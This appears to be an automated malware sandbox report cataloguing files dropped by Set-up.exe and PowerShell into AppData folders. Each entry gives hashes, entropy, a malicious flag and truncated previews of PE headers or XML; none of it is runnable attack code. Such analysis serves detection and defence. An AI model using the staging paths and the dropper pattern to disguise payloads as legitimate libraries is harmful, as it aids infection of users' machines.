                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<*,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&..*...Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\UPEC\QtGui4.dll

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):8581632
                                                                                          Entropy (8bit):6.736578346160889
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                          MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                          SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                          SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                          SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\UPEC\QtNetwork4.dll

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1053696
                                                                                          Entropy (8bit):6.539052666912709
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                          MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                          SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                          SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                          SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\UPEC\QtXml4.dll

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):356352
                                                                                          Entropy (8bit):6.447802510709224
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                          MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                          SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                          SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                          SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\UPEC\StarBurn.dll

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):669792
                                                                                          Entropy (8bit):6.967035663118671
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:1/gzbnbASodCXNn5FJX5KrN9VmoBBDFDn8j:FRSoSn5FJX5KZ9VmoDKj
                                                                                          MD5:F75225DB13E3B86477DC8658C63F9B99
                                                                                          SHA1:6FFD5596FD69E161B788001ABAB195CC609476CF
                                                                                          SHA-256:4286CF3C1ED10B8D6E2794AB4ED1CFCDED0EA40D6794016CE926CD9B547C6A00
                                                                                          SHA-512:07DEE210DE39E9F303BB72558C4B2AEB5DE597638F0A5BFDCBE8F8BADFB46A45F7A1518726D543F18682214668D22586299159E2C3947A9285990867BC457327
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d...................."..`........B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\UPEC\isjii

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:Atari 68xxx CPX file (version 4d53)
                                                                                          Category:dropped
                                                                                          Size (bytes):15400
                                                                                          Entropy (8bit):5.921776181449881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:/O3hRJxZvLMOOXgLaQPCDSupU5dwbADeQ6QirDde8QjbcRIo70xdF3yRLZ1XrRbP:gh5dLMOOUVu6gSeDWXo70d3yTJRb+K
                                                                                          MD5:744424FBBAC9BBA03E53DEA3587E327E
                                                                                          SHA1:B1CD89346897AA9A0787336B44E638E231B3CC15
                                                                                          SHA-256:E34C2C400FC112E079D825580F536EE43D5951F4DCA0C2C6C9C521CA609F09A5
                                                                                          SHA-512:7C2291B8E813EFD2C55D4D55620C435205848FCB3E0D7F8DC3153AFA7D6B4BCA7BBF80BB3F3732F850F80ADD87D8165DEEB3B94BC735A70E18509E276627E812
                                                                                          Malicious:false
                                                                                          Preview:.do.....MS...dYIL.Ws....eFR..Dja......[uau..G..C...L.Z.j..Hh....R.._wy.Y..k.pH....sF..G.gO._.G_...DTg..[Q.C...Dg.MK.........NWRLDZQ..wagV...EyP.R.g.Ui..Q.j......vS.p.....l..q..IRr.c...R......q....YAh...aCH..A..s.v...[.mrgRfqX.w.JR...y.....pY.X.s.HuyH..q......^v.N.V\_j.x.k.....X`fRo....sC.Cl....^MaMu..G.i..v].g......jIpS.........`kIv.t..^.a.^dNU....W.M..o...Z.S.Sc.C.c.i.b...UC.I[hIV.BCsLm...jKJ.....y..fcb.EpM..V....u..U.n..`g...c.b..E..r...OGt.Lm..sn.t.YRB..\nSB..vH.w..r.V...w.Sq.Fu...bX.W.....cl....q....GI...s..K.[..H.XX.X`.x`a.I......T..d[..w.R..Nn.Oe.v.u.....d....kVZ..\nX.i.t.v_foubdB...cgeOA.....\Wi.Za.UL.....A...fr.a.CJ.BPCI.x.v...J.n.MI._.[.Y.[Wd...G.C.Wi.cVK..d.lA..p...DH.R.X...u.g.P.[......V...rOhI.g.Ej.M^..x.h......iK.Q.rC..xQj.Rr]D]O..J..fE.YwCMX....me.Sr..c..iD.s...eEt.GnAZL....T.pqlCF.u.TVp[...r.H..].b...kYMo.U.GN...C..mRD...tbPgE.B........l.I..]HA.Xu....Yy..w.mKI.mK.M.....Ra..^ATWdq.....QOu._.ILk.....b...\cbU..a.ENV..eO.QnAVv.....r...o.h.w.Swr..J....beH.^Wl..YFK...Ukqaba...

                                                                                          C:\Users\user\AppData\Roaming\UPEC\looelll

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):798054
                                                                                          Entropy (8bit):7.892501542250156
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:TwzX9HIvQxLWZ+Q6znQ1VK5eTlVUQgEiG9UzV+RhmwhvpYmgDH/3:ghIvSWZ+RStN5B9MV+RhmeizP
                                                                                          MD5:150E5E57AE9177A2CD6E587DF2D3B0EA
                                                                                          SHA1:88C981FB86B2624165CD1FAB41F2C7CCEB57151F
                                                                                          SHA-256:1C11168B529642BA3139672E4DD6BE5B1CAB7A206F220554155AF997427D3DA8
                                                                                          SHA-512:361C1596782BB064169F8BA622838EE945CB83CA422FF3277EEBF574AC3E6257B7470A6705E0E4DA2E996971EC04A849BBB45F8D86181A4DB74B782A47814107
                                                                                          Malicious:false
                                                                                          Preview:_B\MW.k............L.Ej\...p....c..kC..jZf.`rtk..T.gZ...s.Ktio.Lb.SZl...BDdm..vw.....ur..CcE.K..Kv.QXjP....vJ.LB.M..vasa..cYq..m..p.Rv...SRAp.]..l.^....PqY.`mt.W.dHKl.a.d.iX...ns.O.aHa......GJX......_`n..\Q..vW..H.a..fonSOSi.`Eh.Gm..]IH.t.J..MtMhf..W.O....h...r.j..y..x.._.g.b.S...P\..^.....w.........b.nFh..SA..i.VS\B.P.K.tn..U.I.[..`Fl.b..W......`...N....v.Ve...A.......Y.e.].xK...C.S..US......cqW.I.Z`ptM.B.....GOngM.VVabAxP..c..O.HC...^.G.nWl..........rp._.nAM.I.h..r...fut....r.xq..xCW....fWS]Y.Fs..p.B..VxHXyMH..Gub._Yt.CVa.\.OJaw.c^A..._Z.h....m..u.t.c]y.r.P._B....JRvGo.KJOl.xO.I..[....nL.c.r.MN....TkF._d.b.IIsjo..gB.D...s.NkS..oRBULqcY`bs.BIy.aW...K..to.WF..Lu...M.G..r.q..j...qETj.Kw.AyRg^_^Qc.G..S.JH.......f.x.v..Umb.Ll..N...cUtCwMi...P.P.....S.K.BQ^yILl.h._.l..x..B..Y.Q....jx^eNt..u..Gp.GI.S^G....i..P...W..r.......\.yaq^Up..imka.\.Nv.AaJdyC`cPA...D.V.Ov.o..t.f.pI.x`d.R..a.lS.\.p.UhDN....VXlEFcjMy...Ap..X...G.L^.B._W.Fxs]BK..^c..d......JIn]]C.]UwEC.VkF.TT...gBg...t..h..pv.....p`A.AD

                                                                                          C:\Users\user\AppData\Roaming\UPEC\msvcp100.dll

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):421200
                                                                                          Entropy (8bit):6.59808962341698
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                          MD5:03E9314004F504A14A61C3D364B62F66
                                                                                          SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                          SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                          SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\UPEC\msvcr100.dll

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):770384
                                                                                          Entropy (8bit):6.908020029901359
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                          MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                          SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                          SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                          SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\NAudio.xml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1054613
                                                                                          Entropy (8bit):4.601238684297783
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:HCH/qJhYLq2SudOFFEpSQjV2SFq3Pxl2ZRN6hhQvb/0nPubFnkFrAt:8FLZGFEnJt6hhQ0PykFY
                                                                                          MD5:224D05879C6F2B9708EDBB7CF244E76E
                                                                                          SHA1:5DB1157DDFEFFC4C30650B21F014530470EFE729
                                                                                          SHA-256:8E58FFD1BA32AB7EAE118F2861ED1449F49A3CD0C459DF2AC26A1FF1BF4D7245
                                                                                          SHA-512:D3CF29A37D3B5E1FAA7B8153FB2C21DB9A65868530C51D8E589CDD2E010674CD93610DDC10309D15DF07B6E9E6D6D892C8DB0E16E67638BF72BEAD9FC83E4AB9
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0"?>..<doc>.. <assembly>.. <name>NAudio</name>.. </assembly>.. <members>.. <member name="T:NAudio.Codecs.ALawDecoder">.. <summary>.. a-law decoder.. based on code from:.. http://hazelware.luggle.com/tutorials/mulawcompression.html.. </summary>.. </member>.. <member name="F:NAudio.Codecs.ALawDecoder.ALawDecompressTable">.. <summary>.. only 512 bytes required, so just use a lookup.. </summary>.. </member>.. <member name="M:NAudio.Codecs.ALawDecoder.ALawToLinearSample(System.Byte)">.. <summary>.. Converts an a-law encoded byte to a 16 bit linear sample.. </summary>.. <param name="aLaw">a-law encoded byte</param>.. <returns>Linear sample</returns>.. </member>.. <member name="T:NAudio.Codecs.ALawEncoder">.. <summary>.. A-law encoder.. </

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exe

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):424552
                                                                                          Entropy (8bit):6.000236226718345
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:bebeJQsqiaJnFdHfQoB9bls1YxRz5QZ1y+ymaQfA30KQBhYJXv4M4Mz07ROZH1pH:jh+nf4+tG/vyohq4M4M4gl7T
                                                                                          MD5:A341D9BFAAE6A784CB9E2EA49C183FB4
                                                                                          SHA1:D061C12DFFA6A725F649DAE49C99F157E93BB175
                                                                                          SHA-256:52416BB8275988AA5145BE6359B6C6A92E3C20817544682C2C1978B50FF2052C
                                                                                          SHA-512:9DFF4BA2ABF889C9F9E71DA1F91ABDDE1742A542B53E8C289E011113E1BCB86D4B1AAF5E7AADF97AA5ED36AB50227295E27CE700D30524F7198FD8F3928C36A2
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.. yx.syx.syx.sp.#sux.s...r{x.sl..rex.sl..rsx.sl..rzx.sl..r.x.syx.szx.syx.s.x.sO..r.x.sO.Osxx.syx'sxx.sO..rxx.sRichyx.s........PE..d....\.e.........."....%............4..........@...................................../....`..........................................................`...........F...R..h(...p..8"..PT..T............................S..@............................................text............................... ..`.rdata..............................@..@.data....a.......\..................@....pdata...F.......H..................@..@.rsrc........`.......&..............@..@.reloc..8"...p...$..................@..B................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exe.config

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1106
                                                                                          Entropy (8bit):5.038231865445437
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dV8F7H3p2/+XBPpZp2/+XBPqp2/+XBw1irkV:cVg7C+XBR4+XBn+XBvrE
                                                                                          MD5:75E66AB540561A0C7D4160271F518243
                                                                                          SHA1:AD6501E407D216744B6C3DE76D7664D9581EBAD2
                                                                                          SHA-256:091AFFF3BB63024B5A7B14EA30306B6753858FD1A33FC8C98E3B5E65FE92FBE7
                                                                                          SHA-512:FCB55C0FDBB984B06AFF2FAFCAEA2596C175AA5A07D2F1A401305D3441338AA266A53D2DE7A7577684884A2E12CE3EE430B2E1D0210684A7EEFAF9EAA0DE115F
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.... <appSettings>.. <add key="DownloadLocation" value=""/>.. </appSettings>.... <runtime>.... <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.... <dependentAssembly>.... <assemblyIdentity name="System.Runtime" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... <dependentAssembly>.... <assemblyIdentity name="System.Threading.Tasks" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... <dependentAssembly>.... <assemblyIdentity name="System.Net.Http" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... </assemblyBinding>.... </runtime>

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\d3dcompiler_47.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4917656
                                                                                          Entropy (8bit):6.3987875878837785
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:+CZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvdiD0N+YEzI4og/RfzHLeHTRhFRNZ:tG2QCwmHjnog/pzHAo/Ay
                                                                                          MD5:B37CC24FCFDCCA9DEAD17A498E66DB9C
                                                                                          SHA1:C959AB27CE476DCB0C7312C30C613FE3307BB877
                                                                                          SHA-256:9F5B1AD41183BA50896EB09BE917B1382980224E212A97080D33C0BF3DEE40DD
                                                                                          SHA-512:E62E1B985939688AA2EB920F5CFA50377934A8256D7AAA8A1DEF705DE1D47E5CD15515D043622553BBE512469F5C2ED05A7BDEDD4F5D17E99109274F9BFFE95C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d.....Ne.........." ......8..........<).......................................K.......K...`A........................................`%G.x....(G.P.....J.@.....H.......J..)....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\devtools_resources.pak

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6175880
                                                                                          Entropy (8bit):5.4706772583563845
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:sLFPZAKkA/koZdvvVqdkTZdvvVqwkF/yWzmJUTvU8ZaTG2os1y3JkkaXSqDJMuXR:WLwW
                                                                                          MD5:731A70D555B49A74607EFA43D407948F
                                                                                          SHA1:01B9D0CF34EAB6D171A819C0A6A694B8B499702E
                                                                                          SHA-256:94B15729530FCF90D11156D38FFD0152ACE21182EE44E63C51DC5E2AF25345D2
                                                                                          SHA-512:4D8EB837BA3FF475F42D72DF0375CA4CC0CA18B4E3702FF39E910D67686AFB81234C457C61BDD36C8927FF73695BB19017423CDA2787242273E0BAA398DDABB0
                                                                                          Malicious:false
                                                                                          Preview:........~....p.....p.....p.3...p.6...p.p...p./...p.3...p.7...pd....p8....pu....pM....p.....p:]$..pu_$..p.0%..p.2%..pQ.%..pR.&..p..+..psi+..pV.+..p..+..p.a0..p.A1..p;.3..p..3..p.?4..p..5..p..5..p..5..p..:..p4W:..p~w:..pD.:..py.:..p0.;..p+.;..pe.=..pe.=..p..>..p..>..p..B..pN.C..pi~E..p..E..p..H..q.PI..q3.L..q.OL..q..L..q,,M..qP?M..q%SN..q..R..qo.U..q.wV..q.xZ..q..Z..q<0[..q..\..q.n\..q.v\..q~w\..q.~\..q.~\..q..\..q..\..q..\..q.\..qy.\..q..\..q.\..qm.\..qs.\..q.\..qp.\..ql.\..q.\. ql.\.!q..\."q..\.#q..].$q=.].%q..].&q..].'q..].(q..].)q..].*qa"].+q.\].,q.n].-q.]..q.]./q..].0qB.].1q..].2q..].3q.].4q..].5q`.].6qL.].7q.].8qG.].9q..].:q..].;q+.].<q..].=q.].>q\.].?qo.].@q..].Aq..].Bq..].Cq..].Dq>.].Eq..].Fq\.].Gq..].HqB.^.Iq..^.Jq).^.Kq8.^.Lq>.^.Mq..^.Nq..^....<^..p&.W._,...T...Ve .8..P.H...=......D.g.{.:..r.....R.j.`.._....a.J...[U....[.o.A.......Uvx......lM........k...2|.+.....c1BJu[G"..A.p.Z.......I..^x....Q4....2f.6..[..#x...T.}r....oP...(i......pr..mU_.O5.2..4{}.MQG..

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ActiveXInstallService.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (403), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5601
                                                                                          Entropy (8bit):4.777090038504722
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm0fUsPXKn5o3OqALPLFS31U87GUkNAsGNuiYzXmoOX1mTXoWlIGe0FsC:LeD5pmKeC3G8SsuiYR1Pl7e0V4zZpBsV
                                                                                          MD5:46876B1E6C8BA1FBF3ABC838CCF809B0
                                                                                          SHA1:45CE70EDD0CA87A5920D43385066087DF134E30F
                                                                                          SHA-256:F49428CABB6F6671D95EF214133100C268D2AB04DBF0F095DD08B0105ED9D8A7
                                                                                          SHA-512:702C319B2D181753BE99D99C3DFF9F6C578934067C89A614E9E4B0A5DA6A0FB3545A3BA4986E12E9DA5DE8C6AF56780982D181A8D949A6E573AF725E2505DECA
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>ActiveX Installer Service</displayName>.. <description>Installs ActiveX controls from approved installation sites</description>.. <resources>.. <stringTable>.. <string id="AxInstSv">ActiveX Installer Service</string>.. <string id="AxISURLZonePolicies">Establish ActiveX installation policy for sites in Trusted zones</string> .. <string id="AxISURLZonePolicies_explain">This policy setting controls the installation of ActiveX controls for sites in Trusted zone. ....If you enable this policy setting, ActiveX controls are installed according to the settings defined by this policy setting. .. ..If you disable or do not configure t

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\AddRemovePrograms.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (496), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):10736
                                                                                          Entropy (8bit):4.664813059485856
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Eyvs59wT2mCtKNSMRdMi4LBDZDHZEzT+ygx5LDkFdzj9nWyihWhqeGzpbeEKJ28m:ZvyiCDdyTO54zj9na8hqe6pbeEK5jq
                                                                                          MD5:DFE20A0CA8674D6EAEA280C139E2688A
                                                                                          SHA1:97027B92D40F5029FF296A9EA3105B775B50C209
                                                                                          SHA-256:C97CD236F8BE2B235685D3D16632482839208604DB3F550F9524EAFDA33B9CA9
                                                                                          SHA-512:120C45BD17045B6F3D4A9295E1888D81FFA99ED0F1D146AA2EEC387C1187EEF8C718179771BC0CDBE01A37A487D933F55C92F6F37954F392F007CBFAA2AEC877
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Arp">Add or Remove Programs</string>.. <string id="DefaultCategory">Specify default category for Add New Programs</string>.. <string id="DefaultCategory_Help">Specifies the category of programs that appears when users open the "Add New Programs" page.....If you enable this setting, only the programs in the category you specify are displayed when the "Add New Programs" page opens. Users can use the Category box on the "Add New Programs" page to display programs in other categories.....To use this setting,

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\AppCompat.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (565), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):10119
                                                                                          Entropy (8bit):4.722381803392372
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:EsMVhCuGKXl6hIAtZUqxw66Utw0Uvk3EUN2X/TDcvEn:J/uX6GAjj6mcvk3EUN2XXcvQ
                                                                                          MD5:93C28840D18ED15AF63308926F5AAC66
                                                                                          SHA1:5ED7A8056F1E8A68FEA17C6EF81B695DF8A3EA70
